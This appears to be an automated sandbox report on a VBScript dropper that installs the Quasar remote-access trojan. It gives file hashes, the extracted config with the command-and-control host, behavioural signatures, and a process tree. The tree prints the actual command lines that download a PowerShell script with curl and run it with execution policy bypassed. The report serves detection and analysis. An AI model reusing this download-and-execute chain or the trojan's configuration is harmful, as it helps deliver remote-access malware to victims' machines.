Analysis
max time kernel: 36s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 16/01/2023, 09:37
Static task: static1
Behavioral task: behavioral1
Sample: asd.vbs
Resource: win7-20221111-en
General
Target: asd.vbs
Size: 484B
MD5: 1663574ead24fc758c224a04057e9da3
SHA1: c2fb493d802d82d93cbb139ab3c3899c31a68bc4
SHA256: 7bf8ea91da860789333adacd1cc7b26ffb593dfe6ebab4651a789bf47d0b92ba
SHA512: ab1d8b4e67f5b9772e2a34ce7ab5695f604fc510d255fdad3b12d1a0c2793c2706172d2f84a29e67f239cf951b328fab30e273b1ee383cee2db4add9704f3840
Malware Config
Extracted
quasar
1.4.0
Office04
ghcc.duckdns.org:4782
a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b
encryption_key: B0326395AC2D48856CAE22978A087DF5DCF5816D
install_name: Client.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: Quasar Client Startup
subdirectory: SubDir
Signatures
Quasar payload (2 IoCs)
  resource: behavioral2/memory/1128-141-0x0000000000400000-0x0000000000484000-memory.dmp  yara_rule: family_quasar
  resource: behavioral2/memory/1128-142-0x000000000047E7AE-mapping.dmp  yara_rule: family_quasar
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  description: Key value queried  ioc: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation  Process: WScript.exe
Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow: 30  ioc: api.ipify.org
  flow: 31  ioc: api.ipify.org
Suspicious use of SetThreadContext (1 IoC)
  description: PID 3384 set thread context of 1128  pid: 3384  Process: powershell.exe  procid_target: 95
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid: 3384  Process: powershell.exe
  pid: 3384  Process: powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description: Token: SeDebugPrivilege  pid: 3384  Process: powershell.exe
  description: Token: SeDebugPrivilege  pid: 1128  Process: RegAsm.exe
Suspicious use of SetWindowsHookEx (1 IoC)
  pid: 1128  Process: RegAsm.exe
Suspicious use of WriteProcessMemory (20 IoCs)
  description: PID 4956 wrote to memory of 4624  pid: 4956  Process: WScript.exe  procid_target: 77
  description: PID 4956 wrote to memory of 4624  pid: 4956  Process: WScript.exe  procid_target: 77
  description: PID 4624 wrote to memory of 2460  pid: 4624  Process: cmd.exe  procid_target: 79
  description: PID 4624 wrote to memory of 2460  pid: 4624  Process: cmd.exe  procid_target: 79
  description: PID 2460 wrote to memory of 628  pid: 2460  Process: cmd.exe  procid_target: 80
  description: PID 2460 wrote to memory of 628  pid: 2460  Process: cmd.exe  procid_target: 80
  description: PID 4956 wrote to memory of 2256  pid: 4956  Process: WScript.exe  procid_target: 90
  description: PID 4956 wrote to memory of 2256  pid: 4956  Process: WScript.exe  procid_target: 90
  description: PID 2256 wrote to memory of 5092  pid: 2256  Process: cmd.exe  procid_target: 92
  description: PID 2256 wrote to memory of 5092  pid: 2256  Process: cmd.exe  procid_target: 92
  description: PID 5092 wrote to memory of 3384  pid: 5092  Process: cmd.exe  procid_target: 93
  description: PID 5092 wrote to memory of 3384  pid: 5092  Process: cmd.exe  procid_target: 93
  description: PID 3384 wrote to memory of 1128  pid: 3384  Process: powershell.exe  procid_target: 95
  description: PID 3384 wrote to memory of 1128  pid: 3384  Process: powershell.exe  procid_target: 95
  description: PID 3384 wrote to memory of 1128  pid: 3384  Process: powershell.exe  procid_target: 95
  description: PID 3384 wrote to memory of 1128  pid: 3384  Process: powershell.exe  procid_target: 95
  description: PID 3384 wrote to memory of 1128  pid: 3384  Process: powershell.exe  procid_target: 95
  description: PID 3384 wrote to memory of 1128  pid: 3384  Process: powershell.exe  procid_target: 95
  description: PID 3384 wrote to memory of 1128  pid: 3384  Process: powershell.exe  procid_target: 95
  description: PID 3384 wrote to memory of 1128  pid: 3384  Process: powershell.exe  procid_target: 95
Processes
C:\Windows\System32\WScript.exe
  command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asd.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 4956
    C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
      - Suspicious use of WriteProcessMemory
      PID: 4624
        C:\Windows\system32\cmd.exe
          command line: cmd.exe /c curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
          - Suspicious use of WriteProcessMemory
          PID: 2460
            C:\Windows\system32\curl.exe
              command line: curl https://files.catbox.moe/nvz0g1.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
              PID: 628
    C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
      - Suspicious use of WriteProcessMemory
      PID: 2256
        C:\Windows\system32\cmd.exe
          command line: cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
          - Suspicious use of WriteProcessMemory
          PID: 5092
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              command line: powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
              - Suspicious use of SetThreadContext
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory
              PID: 3384
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  - Suspicious use of AdjustPrivilegeToken
                  - Suspicious use of SetWindowsHookEx
                  PID: 1128
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 5.1MB
MD5: 7aad8bcb11ff3deab23cc311222fe265
SHA1: 3d9a69c71e00aff947af949441220f18bad9e0d8
SHA256: c90652e3d658848ea93fc3b70bec8122366ea3a9cc79a11cd47d7b5c418b9b2a
SHA512: f6bb4fd8ffab5b08ed8c0991e8c57d91702cbfc6034e7157c720c5b94b55f88788a4273c9ec46e63ac0c286f24ff4ad17e925074f6766a5fab53eb4959728fe9